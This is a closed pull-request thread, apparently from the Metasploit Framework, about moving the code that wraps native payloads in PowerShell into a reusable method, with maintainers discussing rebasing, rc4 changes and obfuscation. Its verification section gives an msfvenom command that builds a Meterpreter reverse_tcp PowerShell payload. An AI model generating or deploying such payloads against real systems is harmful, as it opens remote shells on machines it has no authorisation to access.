Closed red0xff closed 1 year ago
I was just looking through this, and I realize that the rc4 changes are not here. Would you care to rebase this and manually add the rc4 changes made since this PR was created?
@red0xff @bwatters-r7 Any update on this?
This needs to be either rebased or have someone do a manual deconflict merge. Since the rc4 changes that need to get pulled in were relatively new and I wrote them, I was hoping for the author to deconflict and rebase/retest. It's been long enough that I can go ahead and manually deconflict and merge when I'm back on PRs.
Hey @bwatters-r7 @gwillcox-r7, totally forgot about this pull-request, sorry for that, even forgot about its purpose / the reusability I had in mind when I opened it.
I just did a rebase, I'll test it again, and will have a look at the subsequent changes I had in mind when I opened it.
A quick glance over this makes me think it breaks obfuscation of the powershell. I was never a fan of the templates thing in the 1st place, but the way things work today, you can apply obfu passes to the template's product before encoding, compressing, encrypting, etc.
Given this has been open for a while now with no conclusion on how to proceed, and the code has changed significantly since this was opened, I'm going to close this out for now. If we want to proceed with this I'd suggest that we discuss things further if there is still an interest and then look at reopening this PR.
This refactoring moves the code that wraps native payloads in a Powershell script to a separate method `psh_payload`. This can reduce redundancy: the lines are used from `psh_payload`, but are also the same at: https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/post/multi/manage/shell_to_meterpreter.rb#L144-L160

(If this change is approved, I'll also add a wrapper for `psh_payload` at `Msf::Exploit::Powershell`, and I'll update `post/multi/manage/shell_to_meterpreter` accordingly. I made this change because I needed to use the code in `psh_payload` for fixing another module.)

I also made a few minor changes to comments. The `exec_rc4` was undocumented, for example.

Verification

`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f psh-reflection -o <PATH>`

(The `psh-reflection` format at `Msf::Util::EXE` should call `Rex::Powershell::Payload.to_win32pe_psh_reflection`, so this should be enough to verify.)